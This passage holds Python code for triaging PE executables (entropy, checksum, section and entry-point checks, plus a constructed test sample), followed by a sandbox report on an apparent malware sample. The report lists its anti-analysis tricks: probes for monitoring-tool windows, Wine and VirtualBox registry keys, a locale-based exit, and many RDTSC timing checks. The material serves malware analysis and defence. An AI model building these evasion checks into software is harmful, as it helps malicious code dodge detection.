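IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc",
                     ".reloc", ".tls", ".pdata", ".CRT", ".debug", "CODE", "DATA", "BSS"}


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def pe_checksum(data: bytes) -> int:
    """OptionalHeader.CheckSum as imagehlp computes it: a 16-bit one's-complement fold of
    the whole file with the CheckSum dword itself skipped, plus the file length."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    checksum_off = e_lfanew + 4 + 20 + 64  # PE signature + COFF header + field offset
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != checksum_off:
            total += struct.unpack_from("<I", padded, off)[0]
            if total > 0xFFFFFFFF:
                total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Entry point RVA, stored CheckSum and per-section stats (offsets shared by PE32/PE32+)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0] if data[:2] == b"MZ" else -1
    if e_lfanew < 0 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsections, opt_size = struct.unpack_from("<H", data, coff + 2)[0], struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr, *_, chars = SECTION_HEADER.unpack_from(data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vaddr": vaddr, "vsize": vsize,
                         "rawsize": rawsize, "chars": chars,
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum": struct.unpack_from("<I", data, opt + 64)[0], "sections": sections}


def triage_pe(data: bytes) -> dict:
    """Flag what the report flags: odd section names, W+X sections, high entropy,
    an entry point outside the code section, and a CheckSum that does not match."""
    pe, findings, entry_section = parse_pe(data), [], None
    for s in pe["sections"]:
        label = s["name"] if s["name"].strip() else repr(s["name"])
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name {label}")
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {label} is writable and executable")
        if s["entropy"] > 7.0:  # threshold chosen here, not taken from the report
            findings.append(f"section {label} entropy {s['entropy']:.2f} (packed or encrypted)")
        if s["vaddr"] <= pe["entry_rva"] < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
    if entry_section not in (".text", "CODE"):
        findings.append(f"entry point in section {entry_section!r}")
    computed = pe_checksum(data)
    if pe["checksum"] and pe["checksum"] != computed:  # 0 means "not set", normal for user-mode EXEs
        findings.append(f"real checksum: 0x{pe['checksum']:x} should be: 0x{computed:x}")
    return {"entry_section": entry_section, "stored_checksum": pe["checksum"], "computed_checksum": computed,
            "checksum_ok": pe["checksum"] == computed, "findings": findings}


def build_sample_pe(stored_checksum: int = 0) -> bytes:
    """Constructed PE32 (not the analysed file) echoing the report's layout: a blank-named code
    section, a high-entropy W+X 'eyyunreg' section and the entry point inside '.taggant'."""
    file_align, sect_align = 0x200, 0x1000
    packed = b"".join(hashlib.sha256(i.to_bytes(2, "little")).digest() for i in range(128))  # 4 KiB filler
    payloads = [(b"", bytes(range(16)) * 32, 0x60000020),      # CNT_CODE | EXECUTE | READ
                (b"eyyunreg", packed, 0xE0000040),              # INIT_DATA | EXECUTE | READ | WRITE
                (b".taggant", b"\x90" * 0x200, 0xE0000020)]     # CNT_CODE | EXECUTE | READ | WRITE
    headers, raw, rawptr, vaddr = [], b"", 0x200, 0x1000
    for name, body, chars in payloads:
        body += b"\x00" * (-len(body) % file_align)
        headers.append(SECTION_HEADER.pack(name.ljust(8, b"\x00"), len(body), vaddr, len(body), rawptr, 0, 0, 0, 0, chars))
        raw, rawptr, vaddr = raw + body, rawptr + len(body), vaddr + -(-len(body) // sect_align) * sect_align
    opt = bytearray(0xE0)  # PE32 optional header; vaddr is now SizeOfImage, 0x3000 is the start of .taggant
    for fmt, off, val in (("<H", 0, 0x10B), ("<I", 16, 0x3000), ("<I", 28, 0x400000), ("<I", 32, sect_align),
                          ("<I", 36, file_align), ("<I", 56, vaddr), ("<I", 60, 0x200), ("<I", 64, stored_checksum),
                          ("<H", 68, 2)):
        struct.pack_into(fmt, opt, off, val)
    coff = struct.pack("<HHIIIHH", 0x14C, len(payloads), 0, 0, 0, len(opt), 0x0102)  # EXECUTABLE_IMAGE | 32BIT
    head = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + coff + bytes(opt) + b"".join(headers)
    return head + b"\x00" * (0x200 - len(head)) + raw
```

triage_pe(open(path, "rb").read()) gives the same kind of list on a real file; on the constructed sample it reports the blank and invented section names, the two W+X sections, the high-entropy "eyyunreg" data, the entry point in .taggant and, when a wrong value such as the report's 0x1c11d0 is stored, the checksum mismatch. The checksum routine skips the CheckSum dword itself, so the computed value is the same whatever is stored there, which is exactly what lets a tool print "real checksum / should be" from a single pass over the file.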

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13706
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 54239B second address: 5423A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C2D26 second address: 6C2D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679F2h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA430E679F8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6B6CA3 second address: 6B6CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C1C64 second address: 6C1C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C1C6A second address: 6C1C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA43130E316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C1DB3 second address: 6C1DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C1DB7 second address: 6C1DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA43130E31Ch 0x0000000c push esi 0x0000000d jmp 00007FA43130E31Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C1F33 second address: 6C1F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C1F39 second address: 6C1F67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA43130E31Bh 0x00000007 jmp 00007FA43130E327h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007FA43130E32Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C251B second address: 6C251F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C251F second address: 6C2537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA43130E320h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C2537 second address: 6C254D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA430E679EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C254D second address: 6C2551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C2551 second address: 6C2555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C2555 second address: 6C2565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FA43130E32Ah 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5B5F second address: 6C5B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5B63 second address: 6C5B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5B67 second address: 6C5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5B78 second address: 6C5BAD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA43130E323h 0x0000000f popad 0x00000010 nop 0x00000011 mov ch, B4h 0x00000013 push 00000000h 0x00000015 movsx edx, ax 0x00000018 push BFC2319Bh 0x0000001d jl 00007FA43130E324h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5BAD second address: 6C5BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5BB1 second address: 6C5C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 403DCEE5h 0x0000000d jnl 00007FA43130E323h 0x00000013 jmp 00007FA43130E321h 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FA43130E318h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 xor edi, dword ptr [ebp+122D2B44h] 0x0000003c push 00000003h 0x0000003e xor ch, 00000021h 0x00000041 push 8EB0279Ah 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FA43130E327h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5C30 second address: 6C5C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jns 00007FA430E679E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 4EB0279Ah 0x00000015 mov dword ptr [ebp+122D1ADAh], ebx 0x0000001b jmp 00007FA430E679F1h 0x00000020 lea ebx, dword ptr [ebp+124579A3h] 0x00000026 xor dword ptr [ebp+122D3320h], edx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5C6F second address: 6C5C75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5DB6 second address: 6C5E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007FA430E679EEh 0x00000011 nop 0x00000012 movzx ecx, cx 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D307Eh] 0x0000001d jmp 00007FA430E679F0h 0x00000022 push 63AA7104h 0x00000027 jng 00007FA430E679FAh 0x0000002d jmp 00007FA430E679F4h 0x00000032 xor dword ptr [esp], 63AA7184h 0x00000039 add dx, 2A45h 0x0000003e mov edi, 065318F9h 0x00000043 push 00000003h 0x00000045 mov edi, eax 0x00000047 push 00000000h 0x00000049 cmc 0x0000004a pushad 0x0000004b mov ecx, dword ptr [ebp+122D2CD0h] 0x00000051 call 00007FA430E679ECh 0x00000056 call 00007FA430E679F7h 0x0000005b pop edx 0x0000005c pop ebx 0x0000005d popad 0x0000005e push 00000003h 0x00000060 mov dword ptr [ebp+122D1A63h], edi 0x00000066 push FA92E84Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E61 second address: 6C5E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E67 second address: 6C5E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E6C second address: 6C5E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E72 second address: 6C5E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E76 second address: 6C5EB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 3A92E84Ch 0x0000000f mov edi, dword ptr [ebp+122D2A80h] 0x00000015 lea ebx, dword ptr [ebp+124579B7h] 0x0000001b or di, 49BFh 0x00000020 push edx 0x00000021 pushad 0x00000022 jp 00007FA43130E316h 0x00000028 mov eax, dword ptr [ebp+122D2A80h] 0x0000002e popad 0x0000002f pop edi 0x00000030 push eax 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FA43130E31Eh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5EB8 second address: 6C5EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E694B second address: 6E6978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA43130E31Bh 0x00000009 popad 0x0000000a jmp 00007FA43130E327h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6978 second address: 6E697C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E495B second address: 6E495F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4BF3 second address: 6E4BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E4E7D second address: 6E4E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E526F second address: 6E5288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA430E679E6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FA430E679EBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5288 second address: 6E529F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FA43130E316h 0x00000011 jo 00007FA43130E316h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5578 second address: 6E558F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA430E679EBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E558F second address: 6E55A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FA43130E321h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E55A5 second address: 6E55AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE7A4 second address: 6AE7AE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE7AE second address: 6AE7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE7B6 second address: 6AE7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5FDA second address: 6E5FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E5FE0 second address: 6E5FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6123 second address: 6E6131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E6131 second address: 6E6140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FA43130E31Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ECE46 second address: 6ECE57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA430E679EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ECE57 second address: 6ECE5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBDA7 second address: 6BBDAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0B1E second address: 6F0B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F42D6 second address: 6F42E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F46D4 second address: 6F46DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F52AE second address: 6F533C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA430E679E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FA430E679F0h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jnl 00007FA430E679F0h 0x0000001b nop 0x0000001c mov esi, dword ptr [ebp+122D2C84h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007FA430E679E8h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D3320h], ebx 0x00000044 xor dword ptr [ebp+122D2EBAh], eax 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122D3023h], esi 0x00000052 movsx esi, cx 0x00000055 push eax 0x00000056 pushad 0x00000057 pushad 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a jmp 00007FA430E679F8h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F533C second address: 6F5340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5CF5 second address: 6F5CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F5B97 second address: 6F5BA8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA43130E316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F77A0 second address: 6F7810 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA430E679F1h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FA430E679E8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 add dword ptr [ebp+122D3320h], ebx 0x0000002e push 00000000h 0x00000030 mov esi, edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FA430E679E8h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnl 00007FA430E679E8h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F82EA second address: 6F82F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F82F0 second address: 6F82F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F82F4 second address: 6F8311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA43130E322h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F802F second address: 6F8034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA1D8 second address: 6FA1DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA1DC second address: 6FA1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
